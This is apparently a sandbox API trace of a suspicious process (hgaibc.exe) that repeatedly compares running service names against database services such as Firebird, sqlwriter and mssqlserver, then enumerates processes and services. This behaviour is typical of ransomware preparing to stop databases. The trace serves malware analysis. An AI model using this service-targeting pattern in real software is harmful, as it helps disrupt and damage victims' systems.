[0160.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0160.906] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0160.906] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0160.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0160.906] lstrlenW (lpString="nsi") returned 3 [0160.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0160.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0160.906] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0160.906] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0160.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0160.907] lstrlenW (lpString="PcaSvc") returned 6 [0160.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0160.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0160.907] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0160.907] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0160.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0160.907] lstrlenW (lpString="PlugPlay") returned 8 [0160.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0160.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0160.907] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0160.907] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0160.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0160.907] lstrlenW (lpString="Power") returned 5 [0160.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0160.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0160.907] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0160.907] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0160.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0160.907] lstrlenW (lpString="ProfSvc") returned 7 [0160.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0160.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0160.907] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0160.907] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0160.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0160.907] lstrlenW (lpString="RpcEptMapper") returned 12 [0160.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0160.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0160.908] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0160.908] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0160.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0160.908] lstrlenW (lpString="RpcSs") returned 5 [0160.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0160.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0160.908] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0160.908] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0160.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0160.908] lstrlenW (lpString="SamSs") returned 5 [0160.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0160.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0160.908] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0160.908] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0160.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0160.908] lstrlenW (lpString="Schedule") returned 8 [0160.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0160.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0160.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0160.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0160.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0160.908] lstrlenW (lpString="SecurityHealthService") returned 21 [0160.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0160.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0160.909] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0160.909] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0160.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0160.909] lstrlenW (lpString="SENS") returned 4 [0160.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0160.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0160.909] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0160.909] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0160.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0160.909] lstrlenW (lpString="ShellHWDetection") returned 16 [0160.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0160.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0160.909] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0160.909] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0160.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0160.909] lstrlenW (lpString="Spooler") returned 7 [0160.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0160.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0160.909] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0160.910] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0160.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0160.910] lstrlenW (lpString="StateRepository") returned 15 [0160.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0160.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0160.910] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0160.910] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0160.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0160.910] lstrlenW (lpString="SysMain") returned 7 [0160.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0160.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0160.910] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0160.910] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0160.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0160.910] lstrlenW (lpString="SystemEventsBroker") returned 18 [0160.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0160.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0160.910] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0160.910] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0160.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0160.910] lstrlenW (lpString="Themes") returned 6 [0160.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0160.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0160.910] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0160.911] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0160.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0160.911] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0160.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0160.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0160.911] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0160.911] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0160.911] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0160.911] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0160.911] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0160.911] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0160.911] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0160.911] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0160.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x456d7b8 | out: hHeap=0x6a0000) returned 1 [0160.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x420 [0160.931] Process32FirstW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.932] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0160.933] lstrlenW (lpString="System") returned 6 [0160.933] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0160.934] lstrlenW (lpString="smss.exe") returned 8 [0160.934] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.935] lstrlenW (lpString="csrss.exe") returned 9 [0160.935] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0160.936] lstrlenW (lpString="wininit.exe") returned 11 [0160.936] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.937] lstrlenW (lpString="csrss.exe") returned 9 [0160.937] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0160.938] lstrlenW (lpString="winlogon.exe") returned 12 [0160.938] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0160.939] lstrlenW (lpString="services.exe") returned 12 [0160.939] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0160.940] lstrlenW (lpString="lsass.exe") returned 9 [0160.940] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0160.941] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0160.941] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0160.942] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0160.942] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.943] lstrlenW (lpString="svchost.exe") returned 11 [0160.943] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.944] lstrlenW (lpString="svchost.exe") returned 11 [0160.944] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0161.086] lstrlenW (lpString="dwm.exe") returned 7 [0161.086] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.087] lstrlenW (lpString="svchost.exe") returned 11 [0161.087] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.088] lstrlenW (lpString="svchost.exe") returned 11 [0161.088] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.089] lstrlenW (lpString="svchost.exe") returned 11 [0161.089] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.090] lstrlenW (lpString="svchost.exe") returned 11 [0161.090] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.091] lstrlenW (lpString="svchost.exe") returned 11 [0161.091] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.092] lstrlenW (lpString="svchost.exe") returned 11 [0161.092] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.093] lstrlenW (lpString="svchost.exe") returned 11 [0161.093] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.094] lstrlenW (lpString="svchost.exe") returned 11 [0161.094] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.095] lstrlenW (lpString="svchost.exe") returned 11 [0161.095] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.096] lstrlenW (lpString="svchost.exe") returned 11 [0161.096] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0161.097] lstrlenW (lpString="spoolsv.exe") returned 11 [0161.097] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.098] lstrlenW (lpString="svchost.exe") returned 11 [0161.098] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0161.098] lstrlenW (lpString="audiodg.exe") returned 11 [0161.099] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0161.099] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0161.099] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0161.100] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0161.100] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0161.101] lstrlenW (lpString="Memory Compression") returned 18 [0161.102] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0161.102] lstrlenW (lpString="sihost.exe") returned 10 [0161.102] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.103] lstrlenW (lpString="svchost.exe") returned 11 [0161.103] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0161.104] lstrlenW (lpString="msoia.exe") returned 9 [0161.104] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0161.105] lstrlenW (lpString="taskhostw.exe") returned 13 [0161.105] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0161.106] lstrlenW (lpString="explorer.exe") returned 12 [0161.106] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0161.107] lstrlenW (lpString="SearchUI.exe") returned 12 [0161.107] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0161.108] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0161.108] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0161.109] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0161.109] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.110] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0161.110] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0161.111] lstrlenW (lpString="hgaibc.exe") returned 10 [0161.111] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0161.112] lstrlenW (lpString="cmd.exe") returned 7 [0161.112] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0161.112] lstrlenW (lpString="conhost.exe") returned 11 [0161.113] Process32NextW (in: hSnapshot=0x420, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0161.113] CloseHandle (hObject=0x420) returned 1 [0161.113] Sleep (dwMilliseconds=0x1f4) [0161.754] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c010 [0161.763] EnumServicesStatusExW (in: hSCManager=0x458c010, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0161.764] GetLastError () returned 0xea [0161.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1bc4) returned 0x4591fc0 [0161.766] EnumServicesStatusExW (in: hSCManager=0x458c010, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4591fc0, cbBufSize=0x1bc4, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4591fc0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0161.767] CloseServiceHandle (hSCObject=0x458c010) returned 1 [0161.767] lstrlenW (lpString="AppXSvc") returned 7 [0161.767] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", 